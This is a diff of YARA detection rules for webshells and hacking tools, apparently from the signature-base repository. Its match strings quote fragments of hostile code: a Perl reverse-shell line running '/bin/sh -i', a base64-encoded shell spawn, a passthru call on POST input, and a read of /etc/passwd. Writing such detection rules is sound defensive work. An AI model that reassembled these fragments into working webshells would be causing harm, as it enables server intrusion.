 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "42959ba1e3c0f7f198f953e98b9df87059999f5526df4338c109828d0a5a518a"
+		hash = "3a1e1e889fdd974a130a6a767b42655b"
+		logic_hash = "a3449aca3124aa4d920d78e5e674ddd9d8a181b0ce0143032352a69dfdbcad2d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
-		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
 
 	strings:
-		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
-		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
-		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
-		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_9
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_2005
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+		description = "Webshells Auto-generated - file 2005.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98927127-08be-57ac-a090-38c7e614dae7"
-		date = "2014-04-06"
-		modified = "2022-12-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6871-L6891"
+		id = "91d278d5-e9ec-5a28-9a54-4549b4f0cd07"
+		date = "2025-03-29"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7986-L7998"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9f8768f609ccd464f7c2b9d10ce8ea423355e11b05b39e629e5e3de0787e212b"
-		score = 70
-		quality = 77
+		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+		logic_hash = "4d04174b23c9057acf2618c01cd702eaaec2d3508a8c25dd87fdd320c076a3b1"
+		score = 75
+		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
-		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
-		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 3a 3c 62 3e 22 20 2e 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 27 74 6f 74 27 5d 29 2e 20 22 3c 2f 62 3e 22 3b }
-		$ = { 69 66 20 28 69 73 73 65 74 28 24 5f 50 4f 53 54 5b 27 77 71 27 5d 29 20 26 26 20 24 5f 50 4f 53 54 5b 27 77 71 27 5d 3c 3e 22 22 29 20 7b }
-		$ = { 70 61 73 73 74 68 72 75 28 24 5f 50 4f 53 54 5b 27 63 27 5d 29 3b }
-		$ = { 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 74 61 63 22 20 76 61 6c 75 65 3d 22 31 22 3e 42 36 34 20 44 65 63 6f 64 65 3c 62 72 3e }
+		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv
+rule SIGNATURE_BASE_Byloader
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+		description = "Webshells Auto-generated - file byloader.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
+		id = "24940e4b-06eb-548d-9e14-1a8f9c864bd3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6893-L6909"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7999-L8014"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2f2b95415bc990adac38eada20cbc793f286d51f2054bc969e9c667f16717f9"
+		hash = "0f0d6dc26055653f5844ded906ce52df"
+		logic_hash = "66c900e4bc771fb23d7623e57ad51edaa95696c2e31554720582f3e33a1b2e25"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
-		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
-		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
 
 	strings:
-		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
-		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
-		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "NTFS Disk Driver Checking Service"
+		$s3 = "Dumping Description to Registry..."
+		$s4 = "Opening Service .... Failure !"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_1
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Fport
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Dive Shell 1.0"
+		description = "Webshells Auto-generated - file Fport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a87038b-3f78-5b9a-a209-c9026d83363f"
-		date = "2014-04-06"
-		modified = "2022-12-06"
+		id = "664e7b19-4d0b-5062-97d2-0eb34869024d"
+		date = "2025-03-29"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6911-L6930"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8015-L8027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9e3759d45d13e33481b962c4b59a019647a3e80bdd3885c4404169af74288b89"
-		score = 70
-		quality = 79
+		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
+		logic_hash = "b9dc66e249c0577839cc3748f129c343d2ccb7327b92a2a67e4467782d10a25e"
+		score = 75
+		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
-		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
-		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
-		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = { 76 61 72 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3d 20 6e 65 77 20 41 72 72 61 79 28 3c 3f 70 68 70 20 65 63 68 6f 20 24 6a 73 5f 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3f 3e 29 3b }
-		$ = { 69 66 20 28 65 6d 70 74 79 28 24 5f 53 45 53 53 49 4f 4e 5b 27 63 77 64 27 5d 29 20 7c 7c 20 21 65 6d 70 74 79 28 24 5f 52 45 51 55 45 53 54 5b 27 72 65 73 65 74 27 5d 29 29 20 7b }
-		$ = { 69 66 20 28 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 33 38 20 26 26 20 63 75 72 72 65 6e 74 5f 6c 69 6e 65 20 3c 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 20 7b }
+		$s4 = "Copyright 2000 by Foundstone, Inc."
+		$s5 = "You must have administrator privileges to run fport - exiting..."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_2
+rule SIGNATURE_BASE_Backdoor__Fr_
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+		description = "Webshells Auto-generated - file BackDooR (fr).php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "be335331-34d7-5abc-b29b-eac7a5ec3915"
+		id = "fd0c77e8-18b7-5eb4-8ed4-87ee4c864683"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6932-L6951"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8028-L8039"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a63d3b00ad9719140da9bb5dcb49981c4d3758fac13c392d016b47e54f356c8"
+		hash = "a79cac2cf86e073a832aaf29a664f4be"
+		logic_hash = "6c16c200712015eed71aeb119e46bad5f93445a8f719d98ef31f9012cb3551ae"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
-		$s4 = "\\$port = {$_POST['port']};"
-		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
-		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
-		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
 
 	condition:
-		4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Erne_Stres
+rule SIGNATURE_BASE_FSO_S_Ntdaddy
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+		description = "Webshells Auto-generated - file ntdaddy.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e73e42e-b968-5b68-a00d-d2a8a1f3541c"
+		id = "b6b655b8-7bce-5fa5-97b7-a020a7e53f4f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6952-L6973"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8040-L8051"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a0484a5a71715d6a79c89e20919ab89aaa7e85a18ee502651f1f6b29153847a3"
+		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+		logic_hash = "4df6f53ee9bfc0214e69dd858878026e962b90573ed48a5ffdd5523538e8f3bf"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "<input type='submit' value='  open (shill.txt) '>" fullword
-		$s4 = "var_dump(curl_exec($ch));" fullword
-		$s7 = "if(empty($_POST['Mohajer22'])){" fullword
-		$s10 = "$m=$_POST['curl'];" fullword
-		$s13 = "$u1p=$_POST['copy'];" fullword
-		$s14 = "if(empty(\\$_POST['cmd'])){" fullword
-		$s15 = "$string = explode(\"|\",$string);" fullword
-		$s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
 
 	condition:
-		5 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_3
+rule SIGNATURE_BASE_Nstview_Nstview
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Webshells Auto-generated - file nstview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff7c6534-efcf-565e-bfc0-1eaa2e9d7b7d"
+		id = "00df601c-bddb-5da8-bef4-d2122419b5d0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6974-L6993"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8052-L8063"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5c264a294fc75cf2cadd3dba61bc64658989ffe5ddecfa18ba18e66492ad3c71"
+		hash = "3871888a0c1ac4270104918231029a56"
+		logic_hash = "2b25e22d86a672af0b8957f1b0336ed80e09f3389f5045c230af2372db0e3415"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
-		hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
-		hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
-		hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
 
 	strings:
-		$s0 = "header('Content-Length:'.filesize($file).'');" fullword
-		$s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
-		$s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
-		$s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
-		$s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_4
+rule SIGNATURE_BASE_Hytop_Devpack_Upload
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+		description = "Webshells Auto-generated - file upload.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2932cb85-927e-536b-b8d8-a0ac0d1ef8ec"
+		id = "43054993-b0dd-5d2e-9890-db1f47759be5"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6994-L7016"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8064-L8075"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18db4c6728f0575b4d8388dab9563ee98ca9aa5fdc8534bf76856a87820b4596"
+		hash = "b09852bda534627949f0259828c967de"
+		logic_hash = "312020a72a37adb0111ac6d61810c8e476be39dc6456e80e83cd6a680e8ea051"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
-		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
-		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
-		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
-		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
-		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
-		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
-		$s10 = "foreach ($arr as $filename) {" fullword
-		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+		$s0 = "<!-- PageUpload Below -->"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_GFS
+rule SIGNATURE_BASE_Passwordreminder
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+		description = "Webshells Auto-generated - file PasswordReminder.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bde6cfd8-466f-528a-b1e3-f874aa778010"
+		id = "642033ee-4454-5913-8348-4d1579fc0bd8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7018-L7034"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8076-L8087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72a3f117cb11e1461b760c47a3de74283640b6e1daa87b24e45210213bb76609"
+		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+		logic_hash = "f3da5381f5e352c541654d2af918ca8cea8049d137078670dd0538a4d13f676e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
-		hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
-		hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
 
 	strings:
-		$s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
-		$s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
-		$s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell__Crystalshell_V_1_Sosyete_Stres
+rule SIGNATURE_BASE_Pack_Injectt
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
+		description = "Webshells Auto-generated - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "774f7f4c-724a-5eb0-b5de-44b389fd593d"
+		id = "3a640c22-0cd4-5ab1-9216-c68625d7d505"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7035-L7055"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8088-L8103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "78aeabe38f7457060d81c3863098b5e424bc38f13e9e86bbb6ea54827f27afcd"
+		hash = "983b74ccd57f6195a0584cdfb27d55e8"
+		logic_hash = "9f66b7b429ed585888c0fb4943bb12262247b3af8d85bc67309b27752171e66a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
-		hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
-		hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
 
 	strings:
-		$s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
-		$s11 = "scrollbar-darkshadow-color: #101842;" fullword
-		$s15 = "<a bookmark=\"minipanel\">" fullword
-		$s16 = "background-color: #EBEAEA;" fullword
-		$s18 = "color: #D5ECF9;" fullword
-		$s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+		$s3 = "ail To Open Registry"
+		$s4 = "32fDssignim"
+		$s5 = "vide Internet S"
+		$s6 = "d]Software\\M"
+		$s7 = "TInject.Dll"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_10
+rule SIGNATURE_BASE_FSO_S_Remexp_2
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
+		description = "Webshells Auto-generated - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f52013d6-72ce-544c-a7ef-ae2a2ea87108"
+		id = "501544d5-fe52-5933-8782-516ffe18f3ff"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7056-L7076"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8104-L8116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bf731edef55cde5d2ad16510fb9f1a240c1a06b535af7e13300fdbea470df74"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+		logic_hash = "e31e25a7c2b2e970a379a61d2dac335bd37cac48328eee9f3966ff5c77ef6f18"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
-		hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
 
 	strings:
-		$s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
-		$s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
-		$s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
-		$s12 = "else if( $mode & 0xA000 ) " fullword
-		$s17 = "$s=sprintf(\"%1s\", $type); " fullword
-		$s20 = "font-size: 8pt;" fullword
+		$s2 = " Then Response.Write \""
+		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_11
+rule SIGNATURE_BASE_FSO_S_C99
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+		description = "Webshells Auto-generated - file c99.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "590c5320-ef85-5522-94fd-4619749f7eb1"
+		id = "0b176370-a5ab-587a-b0e9-ef4fe5c604bd"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7077-L7099"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8117-L8128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5a559a26314ce603d6454efb71f1243bf89daed920ca2a495a51b94a4cca0045"
+		hash = "5f9ba02eb081bba2b2434c603af454d0"
+		logic_hash = "de769299bbd8b895b84db757fcc037b807f7caaa624c06e9d330934a968b2381"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
-		hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
-		hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
-		hash3 = "80aba3348434c66ac471daab949871ab16c50042"
 
 	strings:
-		$s5 = "$filename = $backupstring.\"$filename\";" fullword
-		$s6 = "while ($file = readdir($folder)) {" fullword
-		$s7 = "if($file != \".\" && $file != \"..\")" fullword
-		$s9 = "$backupstring = \"copy_of_\";" fullword
-		$s10 = "if( file_exists($file_name))" fullword
-		$s13 = "global $file_name, $filename;" fullword
-		$s16 = "copy($file,\"$filename\");" fullword
-		$s18 = "<td width=\"49%\" height=\"142\">" fullword
+		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell__Findsock_Php_Findsock_Shell_Php_Reverse_Shell
+rule SIGNATURE_BASE_Rknt_Zip_Folder_Rknt
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+		description = "Webshells Auto-generated - file RkNT.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6567c8f1-bd7f-5844-b937-3db2d8eb7408"
+		id = "a58a3b33-8096-535a-b930-2eb71347edb8"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7100-L7114"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8129-L8146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2459f7114482e17f087bda4b638c29e237f2f3cb5a9e41e326ed65fc1834b6be"
+		hash = "5f97386dfde148942b7584aeb6512b85"
+		logic_hash = "59de8a40a7081ee5fbea9f413590237c1da9985f2352b32571529baf38c93ddb"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
-		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
-		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
 
 	strings:
-		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+		$s0 = "PathStripPathA"
+		$s1 = "`cLGet!Addr%"
+		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s3 = "oQToOemBuff* <="
+		$s4 = "ionCdunAsw[Us'"
+		$s6 = "CreateProcessW: %S"
+		$s7 = "ImageDirectoryEntryToData"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_6
+rule SIGNATURE_BASE_Dbgntboot
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Webshells Auto-generated - file dbgntboot.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e61ec617-565a-5b24-82f4-3677ef379a06"
